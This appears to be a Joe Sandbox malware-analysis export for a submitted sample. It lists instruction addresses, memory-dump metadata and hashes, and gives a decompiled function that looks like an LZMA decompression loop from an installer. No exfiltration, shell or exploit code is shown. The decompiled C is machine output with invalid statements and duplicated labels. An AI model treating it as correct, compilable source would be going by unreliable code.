0x00406357
0x00406362
0x0040636a
0x0040636d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b2
0x004063b8
0x004063bb
0x004063c8
0x004063d0
0x00406a44
0x00406a44
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00406bd6
0x00000000
0x00406bd6
0x00406397
0x004063a2
0x004063a2
0x004063a2
0x004063a5
0x004063a8
0x004063ab
0x004063b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063d8
0x004063da
0x004063dd
0x0040644e
0x00406451
0x00406454
0x0040645b
0x00406465
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00406a44
0x004063df
0x004063e3
0x004063e6
0x004063e8
0x004063eb
0x004063ee
0x004063f0
0x004063f3
0x004063f5
0x004063fa
0x004063fd
0x00406400
0x00406404
0x0040640b
0x0040640e
0x00406415
0x00406419
0x00406421
0x00406421
0x00406421
0x0040641b
0x0040641b
0x0040641b
0x00406410
0x00406410
0x00406410
0x00406425
0x00406428
0x00406446
0x00406448
0x00000000
0x0040642a
0x0040642a
0x0040642d
0x00406430
0x00406433
0x00406435
0x00406435
0x00406435
0x00406438
0x0040643b
0x0040643d
0x0040643e
0x00406441
0x00000000
0x00406441
0x00000000
0x00406677
0x0040667b
0x00406699
0x0040669c
0x004066a3
0x004066a6
0x004066a9
0x004066ac
0x004066af
0x004066b2
0x004066b4
0x004066bb
0x004066bc
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c7
0x004066cc
0x00000000
0x004066cc
0x0040667d
0x00406680
0x00406683
0x0040668d
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00000000
0x004066e1
0x004066e5
0x00406708
0x0040670b
0x0040670e
0x00406718
0x004066e7
0x004066e7
0x004066ea
0x004066ed
0x004066f0
0x004066fd
0x00406700
0x00406700
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00000000
0x00406724
0x00406728
0x00000000
0x00000000
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x0040673a
0x0040673e
0x0040673e
0x00406741
0x00406745
0x00000000
0x00000000
0x00000000
0x00000000
0x004067bc
0x004067c0
0x004067c7
0x004067ca
0x004067cd
0x004067c2
0x004067c2
0x004067c2
0x004067d0
0x004067d3
0x00000000
0x00000000
0x0040687c
0x0040687c
0x00406880
0x00406c1e
0x00000000
0x00406c1e
0x00406886
0x00406889
0x0040688c
0x00406890
0x00406893
0x00406899
0x0040689b
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x00000000
0x00000000
0x00406471
0x00406471
0x00406475
0x00406be2
0x00000000
0x00406be2
0x0040647b
0x0040647e
0x00406481
0x00406485
0x00406488
0x0040648e
0x00406490
0x00406490
0x00406490
0x00406493
0x00406496
0x00406496
0x00406499
0x0040649c
0x00000000
0x00000000
0x004064a2
0x004064a8
0x00000000
0x00000000
0x004064ae
0x004064ae
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064bf
0x004064c2
0x004064c4
0x004064ca
0x004064cd
0x004064d0
0x004064d3
0x004064d6
0x004064d9
0x004064dc
0x004064f8
0x004064fb
0x004064fe
0x00406501
0x00406508
0x0040650c
0x0040650e
0x00406512
0x004064de
0x004064de
0x004064e2
0x004064ea
0x004064ef
0x004064f1
0x004064f3
0x004064f3
0x00406515
0x0040651c
0x0040651f
0x00000000
0x00406525
0x00000000
0x00406525
0x00000000
0x0040652a
0x0040652a
0x0040652e
0x00406bee
0x00000000
0x00406bee
0x00406534
0x00406537
0x0040653a
0x0040653e
0x00406541
0x00406547
0x00406549
0x00406549
0x00406549
0x0040654c
0x0040654f
0x0040654f
0x0040654f
0x00406555
0x00000000
0x00000000
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406569
0x0040656c
0x0040656f
0x00406572
0x00406575
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406596
0x00406599
0x0040659d
0x0040659f
0x00406577
0x00406577
0x0040657f
0x00406584
0x00406586
0x00406588
0x00406588
0x004065a2
0x004065a9
0x004065ac
0x00000000
0x004065ae
0x00000000
0x004065ae
0x004065ac
0x004065b3
0x004065b3
0x004065b3
0x004065b3
0x00000000
0x00000000
0x004065ee
0x004065ee
0x004065f2
0x00406bfa
0x00000000
0x00406bfa
0x004065f8
0x004065fb
0x004065fe
0x00406602
0x00406605
0x0040660b
0x0040660d
0x0040660d
0x0040660d
0x00406610
0x00406613
0x00406613
0x00406619
0x004065b7
0x004065b7
0x004065ba
0x00000000
0x004065ba
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406636
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406661
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x00406666
0x0040666d
0x00406670
0x00000000
0x00406672
0x00000000
0x00406672
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a0e
0x00406a12
0x00406a34
0x00406a37
0x00406a41
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00406a44
0x00406a14
0x00406a17
0x00406a1b
0x00406a1e
0x00406a1e
0x00406a21
0x00000000
0x00000000
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00406b02
0x00406b02
0x00000000
0x00406b02
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00000000
0x00406bbc
0x00406bbf
0x00406ac0
0x00000000
0x00000000
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406813
0x00406815
0x00406817
0x00406817
0x00406818
0x0040681b
0x00406822
0x00406825
0x00406833
0x00000000
0x00000000
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00000000
0x00406b18
0x00406b18
0x00406b1c
0x00406c54
0x00000000
0x00406c54
0x00406b22
0x00406b25
0x00406b28
0x00406b2c
0x00406b2f
0x00406b35
0x00406b37
0x00406b37
0x00406b37
0x00406b3a
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b40
0x00406b40
0x00406b44
0x00406ba4
0x00406ba7
0x00406bac
0x00406bad
0x00406baf
0x00406bb1
0x00406bb4
0x00406ac0
0x00406ac0
0x00000000
0x00406ac6
0x00406ac0
0x00406b46
0x00406b4c
0x00406b4f
0x00406b52
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b64
0x00406b67
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8d
0x00406b8f
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b71
0x00406b76
0x00406b78
0x00406b7b
0x00406b7b
0x00406b96
0x00406b9d
0x00000000
0x00406b9f
0x00000000
0x00406b9f
0x00000000
0x0040683b
0x0040683e
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00000000
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x00406ac0
0x00406a47
0x00406a44
0x00000000
0x00406799

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c817a33af06fbab89762a523cfce827822cf7de0e8706ade38c97c1be13765c
Instruction ID: 05d7d8782b068dec0bfd8eaa121c7d6c027c471cd0affca19148bbed0c80e80b
Opcode Fuzzy Hash: 4c817a33af06fbab89762a523cfce827822cf7de0e8706ade38c97c1be13765c
Instruction Fuzzy Hash: E1713571E04228CBEF28CF98C844BADBBB1FF45305F15806AD856BB291C7785996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004066E1 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004066E1() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406C7B))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc("true", 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc("true",  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
